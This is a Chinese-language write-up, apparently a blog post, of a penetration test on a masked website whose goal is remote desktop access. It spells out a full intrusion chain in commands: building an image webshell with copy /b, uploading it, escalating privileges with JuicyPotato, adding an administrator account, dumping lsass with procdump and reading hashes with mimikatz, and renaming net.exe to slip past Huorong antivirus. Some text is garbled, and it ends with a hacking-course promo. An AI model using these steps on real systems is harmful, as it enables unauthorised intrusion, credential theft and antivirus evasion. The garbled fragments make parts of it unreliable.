记一次Bypass某绒的渗透测试

本次教程较为基础，打码比较严重，有很多不足的地方，希望各位大佬能够指正。

目标站:http://xxx.com 要求:登录远程桌面

通过 超级ping 检测出 站的IP 直接访问ip …

还有Wappalyzer 这个插件也比较好用快速检测出 站的中间件等

尝试下弱口令

他这里会校验用户名， 通过检测不会对访问次数进行限制 ，那还等啥~

burp一梭跑， 刚好让他尝尝我大字典的厉害

。。。有点尬 只能手动测试下了， 习惯性的查看一下有没有目录遍历漏洞

（我自己的手法: 找到一张图片->右键复制地址到地址栏->查看相关路径->访问）

(注意:图片一般最好选择文章或者资料里面的 别问，问就是直觉)

利用poc上传（自己构造好html上传界面，然后上传自己服务器上的图片马用 行截断就可以了）

（服务器：白嫖一年彩虹云云主机 图片马: 非常简单，我们只需要一张图片1.jpg 一句话木马写好的aspx文件 1.aspx，之后我们进入到命令行。注意：将aspx文件和图片文件放到同一目录下，cmd也要跳转到放文件的目录下
之后执行命令 copy 1.jpg/b + 1.aspx/a 2.jpg 新生成的2.jpg就是我们制作好的图片马了。）

将POC中的url更换成我们的目标站,上传格式 http://myweb.com/1.jpgspx

上传成功 直接返回一句话地址

成功getshell ，查看下权限

Systeminfo

2012 修补了8个补丁 先祭出神站

https://bugs.hacking8.com/tiquan/ 在线 exp对比，非常值得推荐

这里看到2012 啥也别说烂土豆一梭跑

发现上传不上。。。

成功写入并查询成功 然后新建一个大马

成功 ，然后配合我的可读可写的马子， 成功上传烂土豆

看到一个 33890 越看越像3389 tasklist -svc : 查看系统进程 找到对应的pid

不得不吐槽一下这个管理员 真的有点2…

3389端口到手，内 IP到手，system权限到手，接下来直接添加账 登录了

Net user abc abc /add 添加账

net localgroup administrators abc /add 将用户添加到管理员组

执行命令发现无回显，刚开始以为对账 密码的长度有限制，但是测试了很多次发现不是这个问题，

明明是system权限为什么不能添加用户呢strong>

在白天打工的时候用手机找到很多类似对应的情况：有杀软、对账 密码有限制、防火墙等等 并且从 上找到了很多绕过的姿势 ，晚上回到家二话不说就开干，tasklist -svc

。。。n m 玩鸡毛 再试试另一种方法，直接mimimakatz读取administrator的密码

但是这里是server2012 尝试使用procdump来导出目标主机的lsass.dmp 到本机用mimikatz读取密码

1.导出lsass.exe
procdump64.exe -accepteula -ma lsass.exe lsass.dmp

2.执行mimikatz
mimikatz.exe “sekurlsa::minidump lsass.dmp” “sekurlsa::logonPasswords full” exit

（前提需要管理员权限）
读出了hash没读出明文密码

啥话不说直接开干

copy C:WindowsSystem32net.exe /net1.exe

任务完成 打扫战场 收工

总结：

安装相关浏览器插件会很方便的进行信息收集

遇到问题不要一股脑的问别人，先想办法自己解决

多收集一些好用的工具、 站等，用的时候直接就能甩过来

多总结自己的经验和收获，这样你才能在实战中快速上手

黑客渗透视频教程，扫码免费领